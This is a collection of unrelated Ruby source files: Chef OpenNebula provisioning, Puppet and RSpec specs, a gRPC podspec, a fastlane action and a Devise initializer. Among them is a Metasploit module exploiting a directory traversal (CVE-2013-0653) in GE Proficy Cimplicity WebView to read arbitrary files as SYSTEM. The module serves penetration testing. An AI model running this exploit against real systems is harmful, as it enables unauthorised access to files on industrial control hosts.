"#{k} = #{v}\n"
when 'TYPE', 'DESCRIPTION', 'FSTYPE', 'DRIVER', 'DEV_PREFIX', 'DISK_TYPE'
"#{k} = \"#{v}\"\n"
end
end
# Perform actual update
description = "updated image '#{new_resource.name}'\n" + attrs_to_update.to_s
action_handler.perform_action description do
unless img_template == '' # can happen when we update only PERMISSIONS
rc = @image.update(img_template, true)
fail "failed to update image '#{new_resource.name}': #{rc.message}" if OpenNebula.is_error?(rc)
end
if attrs_to_update.key?('PERMISSIONS')
rc = @image.chmod_octet(attrs_to_update['PERMISSIONS'])
fail "failed to update image '#{new_resource.name}': #{rc.message}" if OpenNebula.is_error?(rc)
end
end
end
else
fail "'size' must be specified" unless new_resource.size
fail "'datastore_id' must be specified" unless new_resource.datastore_id
action_handler.perform_action "allocated image '#{new_resource.name}'" do
@image = new_driver.one.allocate_img(
:name => new_resource.name,
:size => new_resource.size,
:datastore_id => new_resource.datastore_id,
:type => new_resource.type || 'OS',
:fs_type => new_resource.fs_type || 'ext2',
:driver => new_resource.img_driver || 'qcow2',
:prefix => new_resource.prefix || 'vd',
:persistent => new_resource.persistent || false)
new_driver.one.chmod_resource(@image, new_resource.mode)
Chef::Log.info("Image '#{new_resource.name}' allocate in initial state #{@image.state_str}")
@new_resource.updated_by_last_action(true)
end
end
@image
end
action :create do
@image = action_allocate
case @image.state_str
when 'INIT', 'LOCKED'
action_handler.perform_action "wait for image '#{new_resource.name}' to be READY" do
current_driver.one.wait_for_img(new_resource.name, @image.id)
@new_resource.updated_by_last_action(true)
end
when 'READY', 'USED', 'USED_PERS'
else
fail "Image #{new_resource.name} is in unexpected state '#{@image.state_str}'"
end
end
action :destroy do
if exists?
action_handler.perform_action "deleted image '#{new_resource.name}'" do
rc = @image.delete
fail "Failed to delete image '#{new_resource.name}' : #{rc.message}" if OpenNebula.is_error?(rc)
until new_driver.one.get_resource(:image, :name => new_resource.name).nil?
Chef::Log.debug("Waiting for delete image to finish...")
sleep 1
end
@new_resource.updated_by_last_action(true)
end
else
action_handler.report_progress "image '#{new_resource.name}' does not exist - (up to date)"
end
end
action :attach do
fail "Missing attribute 'machine_id'" unless new_resource.machine_id
fail "Failed to attach disk - image '#{new_resource.name}' does not exist" unless exists?
vm = new_driver.one.get_resource(:virtualmachine, new_resource.machine_id.is_a?(Integer) ? :id : :name => new_resource.machine_id)
fail "Failed to attach disk - VM '#{new_resource.machine_id}' does not exist" if vm.nil?
action_handler.perform_action "attached disk #{new_resource.name} to #{vm.name}" do
disk_hash = @image.to_hash
disk_tpl = "DISK = [ "
disk_tpl << " IMAGE = #{disk_hash['IMAGE']['NAME']}, IMAGE_UNAME = #{disk_hash['IMAGE']['UNAME']}"
disk_tpl << ", TARGET = #{new_resource.target}" if new_resource.target
disk_tpl << ", DEV_PREFIX = #{new_resource.prefix}" if new_resource.prefix
disk_tpl << ", CACHE = #{new_resource.cache}" if new_resource.cache
disk_tpl << "]"
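          # e.g. (hypothetical image/VM): "DISK = [  IMAGE = my-img, IMAGE_UNAME = oneadmin, TARGET = vdb]"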
disk_id = new_driver.one.get_disk_id(vm, disk_hash['IMAGE']['NAME'])
          if !disk_id.nil?
            action_handler.report_progress "disk is already attached - (up to date)"
          else
            action_handler.report_progress "disk not attached, attaching..."
rc = vm.disk_attach(disk_tpl)
new_driver.one.wait_for_vm(vm.id)
fail "Failed to attach disk to VM '#{vm.name}': #{rc.message}" if OpenNebula.is_error?(rc)
@new_resource.updated_by_last_action(true)
end
end
end
action :snapshot do
fail "Missing attribute 'machine_id'" unless new_resource.machine_id
fail "snapshot '#{new_resource.name}' already exists" if exists?
vm = new_driver.one.get_resource(:virtualmachine, new_resource.machine_id.is_a?(Integer) ? :id : :name => new_resource.machine_id)
fail "Failed to create snapshot - VM '#{new_resource.machine_id}' does not exist" if vm.nil?
action_handler.perform_action "created snapshot from '#{new_resource.machine_id}'" do
disk_id = new_resource.disk_id.is_a?(Integer) ? new_resource.disk_id : new_driver.one.get_disk_id(vm, new_resource.disk_id)
fail "No disk '#{new_resource.disk_id}' found on '#{vm.name}'" if disk_id.nil?
@image = new_driver.one.version_ge_4_14 ? vm.disk_saveas(disk_id, new_resource.name) : vm.disk_snapshot(disk_id, new_resource.name, "", true)
fail "Failed to create snapshot '#{new_resource.name}': #{@image.message}" if OpenNebula.is_error?(@image)
@image = new_driver.one.wait_for_img(new_resource.name, @image)
new_driver.one.chmod_resource(image, new_resource.mode)
if new_resource.persistent
action_handler.report_progress "make image '#{new_resource.name}' persistent"
@image.persistent
end
@new_resource.updated_by_last_action(true)
end
end
action :upload do
fail "'datastore_id' is required" unless new_resource.datastore_id
fail "'image_file' or 'download_url' attribute is required" unless new_resource.image_file || new_resource.download_url
file_url = nil
if new_resource.image_file
fail "image_file #{new_resource.image_file} does not exist" unless ::File.exist? new_resource.image_file
file_url = "http://#{node['ipaddress']}:#{@new_resource.http_port}/#{::File.basename(@new_resource.image_file)}"
else
file_url = new_resource.download_url
end
image_config = {
:name => @new_resource.name,
:datastore_id => @new_resource.datastore_id.to_s,
:path => file_url,
:driver => @new_resource.img_driver || 'qcow2',
:description => @new_resource.description || "#{@new_resource.name} image",
:type => @new_resource.type,
:mode => @new_resource.mode,
:prefix => @new_resource.prefix,
:persistent => @new_resource.persistent,
:public => @new_resource.public,
:target => @new_resource.target,
:disk_type => @new_resource.disk_type,
:source => @new_resource.source,
:size => @new_resource.size,
:fs_type => @new_resource.fs_type
}
if exists?
if @image.name == image_config[:name] &&
@image['PATH'] == image_config[:path] &&
@image['TEMPLATE/DRIVER'] == image_config[:driver] &&
@image['TEMPLATE/DESCRIPTION'] == image_config[:description] &&
@image['DATASTORE_ID'] == image_config[:datastore_id]
action_handler.report_progress("image '#{@new_resource.name}' (ID: #{@image.id}) already exists - (up to date)")
else
fail "image '#{new_resource.name}' already exists, but it is not the same image"
end
else
action_handler.perform_action "upload image '#{@new_resource.name}'" do
if @new_resource.image_file
begin
success = false
pid = nil
trap("CLD") do
cpid = Process.wait
fail "Could not start HTTP server on port #{@new_resource.http_port}" if cpid == pid && !success
end
pid = Process.spawn("python -m SimpleHTTPServer #{@new_resource.http_port}",
:chdir => ::File.dirname(@new_resource.image_file),
STDOUT => "/dev/null",
STDERR => "/dev/null",
:pgroup => true)
new_driver.one.upload_img(image_config)
success = true
@new_resource.updated_by_last_action(true)
ensure
system("sudo kill -9 -#{pid}")
end
else
new_driver.one.upload_img(image_config)
@new_resource.updated_by_last_action(true)
end
end
end
end
action :download do
new_driver = driver
action_handler.perform_action "downloaded image '#{@new_resource.image_file}" do
download_url = ENV['ONE_DOWNLOAD'] || @new_resource.download_url
          fail %('download_url' is a required attribute.
            You can get the value for 'download_url' by logging into your OpenNebula CLI
            and reading the ONE_DOWNLOAD environment variable) if download_url.nil?
image = new_driver.one.get_resource(:image, !@new_resource.image_id.nil? ? { :id => @new_resource.image_id } : { :name => @new_resource.name })
fail "Image 'NAME: #{@new_resource.name}/ID: #{@new_resource.image_id}' does not exist" if image.nil?
local_path = @new_resource.image_file || ::File.join(Chef::Config[:file_cache_path], "#{@new_resource.name}.qcow2")
fail "Will not overwrite an existing file: #{local_path}" if ::File.exist?(local_path)
command = "curl -o #{local_path} #{download_url}/#{::File.basename(::File.dirname(image['SOURCE']))}/#{::File.basename(image['SOURCE'])}"
rc = system(command)
fail rc if rc.nil?
fail "ERROR: #{rc}" unless rc
system("chmod 777 #{local_path}")
Chef::Log.info("Image downloaded from OpenNebula to: #{local_path}")
@new_resource.updated_by_last_action(true)
end
end
protected
def driver
if current_driver && current_driver.driver_url != new_driver.driver_url
fail "Cannot move '#{machine_spec.name}' from #{current_driver.driver_url} to #{new_driver.driver_url}: machine moving is not supported. Destroy and recreate."
end
fail "Driver not specified for one_image #{new_resource.name}" unless new_driver
new_driver
end
def new_driver
run_context.chef_provisioning.driver_for(new_resource.driver)
end
def current_driver
run_context.chef_provisioning.driver_for(run_context.chef_provisioning.current_driver) if run_context.chef_provisioning.current_driver
end
end
end
end
| 46.893855 | 177 | 0.600071 |
91e588a7930a577436b34fabf0b3d806a27e83dd | 597 |
desc 'Set up a dev instance of the Pact Broker'
task 'pact_broker:dev:setup' do
puts "Copying example directory"
FileUtils.cp_r 'example', 'dev'
gemfile_contents = File.read('dev/Gemfile')
puts "Changing source of pact_broker gem from rubygems.org to local file system"
new_gemfile_contents = gemfile_contents.gsub(/^.*gem.*pact_broker.*$/, "gem 'pact_broker', path: '../'")
File.open('dev/Gemfile', "w") { |file| file << new_gemfile_contents }
Dir.chdir("dev") do
Bundler.with_clean_env do
puts "Executing bundle install"
puts `bundle install`
end
end
end
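# Invoke the task from the project root, for example (shown for illustration;
# adjust to your Rake setup):
#
#   bundle exec rake pact_broker:dev:setup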
| 29.85 | 106 | 0.700168 |
e9b26b67db968a548df456db2dc01ec5ca7f984d | 2,291 | require "spec_helper"
describe BetterErrors do
context ".editor" do
it "defaults to textmate" do
subject.editor["foo.rb", 123].should == "txmt://open?url=file://foo.rb&line=123"
end
it "url escapes the filename" do
subject.editor["&.rb", 0].should == "txmt://open?url=file://%26.rb&line=0"
end
[:emacs, :emacsclient].each do |editor|
it "uses emacs:// scheme when set to #{editor.inspect}" do
subject.editor = editor
subject.editor[].should start_with "emacs://"
end
end
[:macvim, :mvim].each do |editor|
it "uses mvim:// scheme when set to #{editor.inspect}" do
subject.editor = editor
subject.editor[].should start_with "mvim://"
end
end
[:sublime, :subl, :st].each do |editor|
it "uses subl:// scheme when set to #{editor.inspect}" do
subject.editor = editor
subject.editor[].should start_with "subl://"
end
end
[:textmate, :txmt, :tm].each do |editor|
it "uses txmt:// scheme when set to #{editor.inspect}" do
subject.editor = editor
subject.editor[].should start_with "txmt://"
end
end
["emacsclient", "/usr/local/bin/emacsclient"].each do |editor|
it "uses emacs:// scheme when EDITOR=#{editor}" do
ENV["EDITOR"] = editor
subject.editor = subject.default_editor
subject.editor[].should start_with "emacs://"
end
end
["mvim -f", "/usr/local/bin/mvim -f"].each do |editor|
it "uses mvim:// scheme when EDITOR=#{editor}" do
ENV["EDITOR"] = editor
subject.editor = subject.default_editor
subject.editor[].should start_with "mvim://"
end
end
["subl -w", "/Applications/Sublime Text 2.app/Contents/SharedSupport/bin/subl"].each do |editor|
it "uses mvim:// scheme when EDITOR=#{editor}" do
ENV["EDITOR"] = editor
subject.editor = subject.default_editor
subject.editor[].should start_with "subl://"
end
end
["mate -w", "/usr/bin/mate -w"].each do |editor|
it "uses txmt:// scheme when EDITOR=#{editor}" do
ENV["EDITOR"] = editor
subject.editor = subject.default_editor
subject.editor[].should start_with "txmt://"
end
end
end
end
| 30.959459 | 100 | 0.601048 |
b9288afd8061eb963c8ee4f4eac963e3e096fc9b | 1,654 | # This file has been automatically generated from a template file.
# Please make modifications to
# `templates/gRPC-RxLibrary.podspec.template` instead. This file can be
# regenerated from the template by running
# `tools/buildgen/generate_projects.sh`.
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
Pod::Spec.new do |s|
s.name = 'gRPC-RxLibrary'
version = '1.13.0-dev'
s.version = version
s.summary = 'Reactive Extensions library for iOS/OSX.'
s.homepage = 'https://grpc.io'
s.license = 'Apache License, Version 2.0'
s.authors = { 'The gRPC contributors' => '[email protected]' }
s.source = {
:git => 'https://github.com/grpc/grpc.git',
:tag => "v#{version}",
}
s.ios.deployment_target = '7.0'
s.osx.deployment_target = '10.9'
name = 'RxLibrary'
s.module_name = name
s.header_dir = name
src_dir = 'src/objective-c/RxLibrary'
s.source_files = "#{src_dir}/*.{h,m}", "#{src_dir}/**/*.{h,m}"
s.private_header_files = "#{src_dir}/private/*.h"
s.header_mappings_dir = "#{src_dir}"
s.pod_target_xcconfig = {
'CLANG_WARN_STRICT_PROTOTYPES' => 'NO',
}
end
| 31.807692 | 74 | 0.698912 |
f7f9059e7ef9c53a373d3076676118c16993aa63 | 82 | class Salesforce::NewsFeed < Salesforce::SfBase
set_table_name 'news_feeds'
end
| 20.5 | 47 | 0.804878 |
0325a8274bb8e562a11493c7e2e8c67c1f7faedb | 3,897 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'uri'
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'GE Proficy Cimplicity WebView substitute.bcl Directory Traversal',
'Description' => %q{
This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the
gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM
privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.
},
'Author' =>
[
'Unknown', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-0653' ],
[ 'OSVDB', '89490' ],
[ 'BID', '57505' ],
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02' ]
],
'DisclosureDate' => 'Jan 22 2013'))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI',[true, 'Path to CimWeb', '/CimWeb']),
OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
# By default gefebt.exe installed on C:\Program Files\GE Fanuc\Proficy CIMPLICITY\WebPages\CimWeb
OptInt.new('DEPTH', [true, 'Traversal depth', 5])
], self.class)
end
def normalize_uri(*strs)
new_str = strs * "/"
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str[0,1] == '/'
new_str = '/' + new_str
end
new_str
end
def target_uri
begin
# In case TARGETURI is empty, at least we default to '/'
u = datastore['TARGETURI']
u = "/" if u.nil? or u.empty?
URI(u)
rescue ::URI::InvalidURIError
print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
raise Msf::OptionValidateError.new(['TARGETURI'])
end
end
def my_basename(filename)
return ::File.basename(filename.gsub(/\\/, "/"))
end
def is_proficy?
connect
req = "GET #{normalize_uri(target_uri.path, "index.html")} HTTP/1.0\r\n\r\n"
sock.put(req)
res = sock.get_once
disconnect
if res and res =~ /gefebt\.exe/
return true
else
return false
end
end
  # We can't use the http client msf mixin because the Proficy web server
  # returns a malformed HTTP response with the file contents: there is only
  # one newline (instead of two) between the HTTP headers and the body content.
def read_file(file)
travs = ""
travs << "../" * datastore['DEPTH']
travs << file
print_status("#{@peer} - Retrieving file contents...")
connect
req = "GET #{normalize_uri(target_uri.path, "gefebt.exe")}?substitute.bcl+FILE=#{travs} HTTP/1.0\r\n\r\n"
sock.put(req)
res = sock.get_once
disconnect
if res and res =~ /HTTP\/1\.0 200 OK/
return res
else
return nil
end
end
def run
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Checking if it's a GE Proficy Application...")
if is_proficy?
print_good("#{@peer} - Check successful")
else
print_error("#{@peer} - GE proficy not found")
return
end
contents = read_file(datastore['FILEPATH'])
if contents.nil?
print_error("#{@peer} - File not downloaded")
return
end
file_name = my_basename(datastore['FILEPATH'])
path = store_loot(
'ge.proficy.traversal',
'application/octet-stream',
rhost,
contents,
file_name
)
print_good("#{rhost}:#{rport} - File saved in: #{path}")
end
end
| 27.0625 | 110 | 0.606107 |
ac819bd29fbfaa81fcdee03bd54c5065b5ab60ee | 5,851 | require 'spec_helper'
describe 'sudo' do
context 'with class default options' do
it do
should contain_package('sudo-package').with({
'ensure' => 'present',
'name' => 'sudo',
})
should contain_file('/etc/sudoers.d').with({
'ensure' => 'present',
'owner' => 'root',
'group' => 'root',
'mode' => '0750',
'recurse' => 'true',
'purge' => 'true',
})
should contain_file('/etc/sudoers').with({
'owner' => 'root',
'group' => 'root',
'mode' => '0440',
})
end
end
context 'with all options set and manage all resources' do
let(:params) { {:package => 'package',
:package_ensure => 'absent',
:package_source => '/file',
:package_adminfile => '/adminfile',
:package_manage => 'true',
:config_dir => '/folder',
:config_dir_ensure => 'absent',
:config_dir_mode => '0550',
:config_dir_group => 'bar',
:config_dir_purge => 'false',
:sudoers_manage => 'true',
:sudoers => { 'root' => { 'content' => 'root ALL=(ALL) ALL' }, 'webusers' => { 'priority' => '20', 'source' => 'puppet:///files/webusers' } },
:config_file => '/sudoers/file',
:config_file_group => 'group',
:config_file_owner => 'owner',
:config_file_mode => '1555',
} }
it do
should contain_package('sudo-package').with({
'ensure' => 'absent',
'name' => 'package',
'source' => '/file',
'adminfile' => '/adminfile',
})
should contain_file('/folder').with({
'ensure' => 'absent',
'owner' => 'root',
'group' => 'bar',
'mode' => '0550',
'recurse' => 'false',
'purge' => 'false',
})
should contain_file('10_root').with({
'ensure' => 'present',
'path' => '/folder/10_root',
'owner' => 'root',
'group' => 'bar',
'mode' => '0440',
'content' => 'root ALL=(ALL) ALL',
})
should contain_file('20_webusers').with({
'ensure' => 'present',
'path' => '/folder/20_webusers',
'owner' => 'root',
'group' => 'bar',
'mode' => '0440',
'source' => 'puppet:///files/webusers',
})
should contain_file('/sudoers/file').with({
'owner' => 'owner',
'group' => 'group',
'mode' => '1555',
})
end
end
context 'with default options and package_manage false' do
let(:params) { {:package_manage => 'false' } }
it do
should contain_file('/etc/sudoers.d').with({
'ensure' => 'present',
'owner' => 'root',
'group' => 'root',
'mode' => '0750',
'recurse' => 'true',
'purge' => 'true',
})
should contain_file('/etc/sudoers').with({
'owner' => 'root',
'group' => 'root',
'mode' => '0440',
})
should_not contain_package('sudo-package')
end
end
context 'with default options and sudoers_manage false' do
let(:params) { {:sudoers_manage => 'false' } }
it do
should contain_package('sudo-package').with({
'ensure' => 'present',
'name' => 'sudo',
})
should_not contain_file('/etc/sudoers.d')
should_not contain_file('/etc/sudoers')
end
end
context 'with sudoers_manage and package_manage false and with sudoers hash' do
let(:params) { {:sudoers => { 'root' => { 'content' => 'root ALL=(ALL) ALL' }, 'webusers' => { 'priority' => '20', 'source' => 'puppet:///files/webusers' } },
:sudoers_manage => 'false',
:package_manage => 'false',
} }
it do
should_not contain_package('sudo-package')
should_not contain_file('/etc/sudoers.d')
should_not contain_file('/etc/sudoers')
should_not contain_file('10_root')
should_not contain_file('20_webusers')
end
end
context 'with specifying package_manage param set to invalid value' do
let(:params) { {:package_manage => [ true ] } }
it do
expect { should }.to raise_error(Puppet::Error,/is not a boolean/)
end
end
context 'with specifying sudoers_manage param set to invalid value' do
let(:params) { {:sudoers_manage => 'foo' } }
it do
expect { should }.to raise_error(Puppet::Error,/Unknown type/)
end
end
context 'with specifying config_dir_purge set to invalid value' do
let(:params) { {:config_dir_purge => 'invalid' } }
it do
expect { should }.to raise_error(Puppet::Error,/Unknown type/)
end
end
context 'with specifying config_dir set to invalid value' do
let(:params) { {:config_dir => 'invalidpath' } }
it do
expect { should }.to raise_error(Puppet::Error,/is not an absolute path/)
end
end
context 'with specifying config_file param set to invalid value' do
let(:params) { {:config_file => 'invalidpath' } }
it do
expect { should }.to raise_error(Puppet::Error,/is not an absolute path/)
end
end
context 'with specifying adminfile param set to invalid value' do
let(:params) { {:package_adminfile => 'invalidpath' } }
it do
expect { should }.to raise_error(Puppet::Error,/is not an absolute path/)
end
end
context 'with specifying sudoers hash set to invalid value' do
let(:params) { {:sudoers => [ "not_a_hash" ] } }
it do
expect { should }.to raise_error(Puppet::Error,/is not a Hash/)
end
end
end
| 34.017442 | 172 | 0.519398 |
bf28b738af2eb9e1fff72cd95bfb7c9d6ab6e5c5 | 433 | module GeoPattern
class ColorPreset
attr_accessor :color, :base_color, :mode
def initialize(color: nil, base_color: nil)
@color = color
@base_color = base_color
end
# Return mode
#
# @return [Symbol]
# The color mode
def mode
if color.nil? || color.empty?
:base_color
else
:color
end
end
def mode?(m)
mode == m
end
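    # A minimal usage sketch (the color values are illustrative):
    #
    #   preset = ColorPreset.new(color: '#00f')
    #   preset.mode                                  # => :color
    #   preset.mode?(:color)                         # => true
    #   ColorPreset.new(base_color: '#933c3c').mode  # => :base_color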
end
end
| 16.037037 | 47 | 0.551963 |
1d27b507a7c2368f9d3b8190a88d531055602336 | 2,268 | module Fastlane
module Actions
class GitPullAction < Action
def self.run(params)
commands = []
unless params[:only_tags]
command = "git pull"
command << " --rebase" if params[:rebase]
commands += ["#{command} &&"]
end
commands += ["git fetch --tags"]
Actions.sh(commands.join(' '))
end
def self.description
"Executes a simple git pull command"
end
def self.available_options
[
FastlaneCore::ConfigItem.new(key: :only_tags,
description: "Simply pull the tags, and not bring new commits to the current branch from the remote",
is_string: false,
optional: true,
default_value: false,
verify_block: proc do |value|
UI.user_error!("Please pass a valid value for only_tags. Use one of the following: true, false") unless value.kind_of?(TrueClass) || value.kind_of?(FalseClass)
end),
FastlaneCore::ConfigItem.new(key: :rebase,
description: "Rebase on top of the remote branch instead of merge",
is_string: false,
optional: true,
default_value: false,
verify_block: proc do |value|
UI.user_error!("Please pass a valid value for rebase. Use one of the following: true, false") unless value.kind_of?(TrueClass) || value.kind_of?(FalseClass)
end)
]
end
def self.authors
["KrauseFx", "JaviSoto"]
end
def self.is_supported?(platform)
true
end
def self.example_code
[
'git_pull',
'git_pull(only_tags: true) # only the tags, no commits',
'git_pull(rebase: true) # use --rebase with pull'
]
end
def self.category
:source_control
end
end
end
end
| 34.892308 | 200 | 0.474868 |
bb08d6b6c1471df75bd7a32c0421005c5fdd8fef | 423 | module EmergencyBanner
class Deploy
def run(campaign_class, heading, short_description = "", link = "", link_text = "")
redis = Redis.new
redis.hmset(:emergency_banner,
:campaign_class, campaign_class,
:heading, heading,
:short_description, short_description,
:link, link,
                  :link_text, link_text)
end
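    # A minimal usage sketch (the field values are illustrative):
    #
    #   EmergencyBanner::Deploy.new.run(
    #     'notable-death',
    #     'Emergency banner heading',
    #     'A short description',
    #     'https://www.gov.uk',
    #     'More information'
    #   )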
end
end
| 30.214286 | 87 | 0.565012 |
f78425dd3fbbc4447d9c43de5efeb30685eeadab | 14,457 | # frozen_string_literal: true
# Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# Devise will use the `secret_key_base` as its `secret_key`
# by default. You can change it below and use your own secret key.
# config.secret_key = '2d407124742c65bc392cd5f7a61b3b71a8efd6d08b6827c8d68bc2615e5eed44bdb1a633e0474582225322c3abc5490e3464be836e0d85bce7d4bcee15144a9f'
# ==> Controller configuration
# Configure the parent class to the devise controllers.
# config.parent_controller = 'DeviseController'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# Configure the parent class responsible to send e-mails.
# config.parent_mailer = 'ActionMailer::Base'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [:email]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [:email]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [:email]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# When false, Devise will not attempt to reload routes on eager load.
# This can reduce the time taken to boot the app but if your application
# requires the Devise mappings to be loaded during boot time the application
# won't boot properly.
# config.reload_routes = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 11. If
# using other algorithms, it sets how many times you want the password to be hashed.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# algorithm), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 11
# Set up a pepper to generate the hashed password.
# config.pepper = '553b9bef15ed285e6a93aced514b447d8577c26dde669179cbda32bf4eb7904fae8cea0c9216989f40b10140eda564c48feefa28ff660b56ec8a3ce0dfa3e448'
# Send a notification to the original email when the user's email is changed.
# config.send_email_changed_notification = false
# Send a notification email when the user's password is changed.
# config.send_password_change_notification = false
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day.
# You can also set it to nil, which will allow the user to access the website
# without confirming their account.
# Default is 0.days, meaning the user cannot access the website without
# confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [:email]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
config.email_regexp = /\A[^@\s]+@[^@\s]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [:email]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [:email]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# When set to false, does not sign a user in automatically after their password is
# reset. Defaults to true, so a user is signed in automatically after a reset.
# config.sign_in_after_reset_password = true
# ==> Configuration for :encryptable
# Allow you to use another hashing or encryption algorithm besides bcrypt (default).
# You can use :sha1, :sha512 or algorithms from others authentication tools as
# :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20
# for default behavior) and :restful_authentication_sha1 (then you should set
# stretches to 10, and copy REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
